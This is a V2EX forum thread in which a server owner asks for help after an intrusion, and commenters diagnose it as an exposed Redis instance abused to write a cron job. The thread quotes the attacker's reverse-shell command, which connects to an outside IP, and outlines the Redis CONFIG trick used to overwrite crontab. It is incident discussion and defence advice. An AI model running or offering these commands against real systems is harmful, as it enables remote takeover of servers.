服务器被入侵了,有懂的老铁帮忙看下,万分感谢

2020-12-22 22:29:04 +08:00
 bigbigeggs

crontab 的定时任务全部被清空,换成了 如下

"\n* * * * * bash -i >& /dev/tcp/123.56.128.98/8888 0>&1\n"

删除之后,过几秒之后,又出现在了定时任务中了。

百度了下看起来像是 反弹 shell,可以看到你在服务器的任何行为。

现在不知道怎么解决,不知道哪个脚本在后台执行,一直写定时任务进去。

求有懂得老铁帮忙看下

4410 次点击
所在节点    问与答
47 条回复
steptodream
2020-12-23 08:19:11 +08:00
感觉肯定是 redis 被黑 redis 暴露公网被黑的太多了 光是 V2EX 上就看到好几起了
alw
2020-12-23 08:51:08 +08:00
我之前 就是 redis 对外开放被黑过,当时不懂,找腾讯云提工单帮我查,定位到了是这个问题导致的。
littlezzll
2020-12-23 09:02:08 +08:00
redis 暴露公网端口一定得加密码,以普通用户启动,前一阵就被 redis 那个提权漏洞搞过
boris93
2020-12-23 09:07:58 +08:00
@opengps #3 神奇的是,8888 打开的是 OwnCloud,是个私人云盘......
sagaxu
2020-12-23 09:12:44 +08:00
iptables INPUT 默认策略不该是 DROP 吗?
PbCopy111
2020-12-23 09:15:27 +08:00
妈呀,备案信息里什么都有啊。。。。我觉得楼主可以直接跟对方联系一下,备份服务器以后可以威胁报警了,哈哈哈哈。
PbCopy111
2020-12-23 09:16:23 +08:00
你们都慢点动手啊!!!!!!!给我留点时间!!
ferock
2020-12-23 09:18:09 +08:00
一直不理解,redis 有什么必要暴露到公网???
Dounx
2020-12-23 09:24:08 +08:00
有备案信息,备份好服务器直接报个警?
zszhere
2020-12-23 09:54:04 +08:00
@bigbigeggs 附议 14 楼观点 别查了 查不清楚。简单点会隐藏在 系统启动项 /etc/rc*.d bash 启动项 /etc/profile.d 高级点 上 rootkit 或者改掉你的 libc.so 或者 改掉你的 curl wget 等常用二进制 还有很多骚操作 排查不清。重装吧。
k8ser
2020-12-23 11:05:10 +08:00
脚本小子,这你不报警抓他,一抓一个准,做好取证,警察叔叔过年都冲业绩呢!
ericwood067
2020-12-23 11:19:04 +08:00
"\n* * * * *"大佬们,这个是多久执行一次,被`\n*`给搞懵了
ztxcccc
2020-12-23 11:29:06 +08:00
报警不是美滋滋
kiracyan
2020-12-23 12:02:46 +08:00
这人还是个搞网络安全的 github blog 备案都有 也太不小心了
azev
2020-12-23 12:03:37 +08:00
@opengps 可能那个网站也被黑了 成肉鸡了
iloveayu
2020-12-23 12:23:08 +08:00
名字,扣扣,IP 都有了,保留好证据直接报警吧,这手法还搞网安呢也是没谁了。。。
uselessVisitor
2020-12-23 13:23:55 +08:00
你的 redis 是 root 用户吧
bigbigeggs
2020-12-23 16:14:42 +08:00
感谢各位大佬的帮助以及建议,昨晚排查到快一点,今天早上又看了看,基本搞懂了。

首先攻击者拿到了我的 redis 端口和密码(全暴露在了公网,具体还不清楚怎么搞到的)

然后往 redis 里面写了一条数据,set x "\n* * * * * bash -i >& /dev/tcp/123.56.128.98/8888 0>&1\n"

然后利用 redis 的 conf 命令 见 RDB 文件的地址替换成了 crontab 的地址 ,日志如下:

![redis]( https://images.cnblogs.com/cnblogs_com/wenbochang/1355057/o_201223080258redis.png)

然后他的这条 bash 命令就写进了 cron 定时任务里面去了。

查了查定时任务的日志,大概在 12.9 日已经入侵了,但不知道入侵者的目的。

![redis]( https://images.cnblogs.com/cnblogs_com/wenbochang/1355057/o_201223080248cron.png)

至今位置,cpu, 内存都一切正常,数据也没有丢失。但是应该数据库,redis,zk 等密码他全部获取到了。

写到了环境变量里面去了,唉。

晚上准备收集一下他的资料,准备和他谈谈,再次感谢各位大佬的帮助了。

可以参考如下两篇文章,写的很详细:

redis 入侵: https://www.cnblogs.com/evan-blog/p/10707087.html

反弹 shell: https://www.cnblogs.com/bonelee/p/11021996.html
bigbigeggs
2020-12-23 16:15:46 +08:00
@beichenhpy 是的,root 用户。已经肯定了是从 redis 入侵的,修改了 dump 文件目录
bigbigeggs
2020-12-23 16:17:16 +08:00
@k8ser @ztxcccc 感觉报警有点麻烦,晚上研究下他的网址。看看能不能联系上,聊一下。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/738036

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX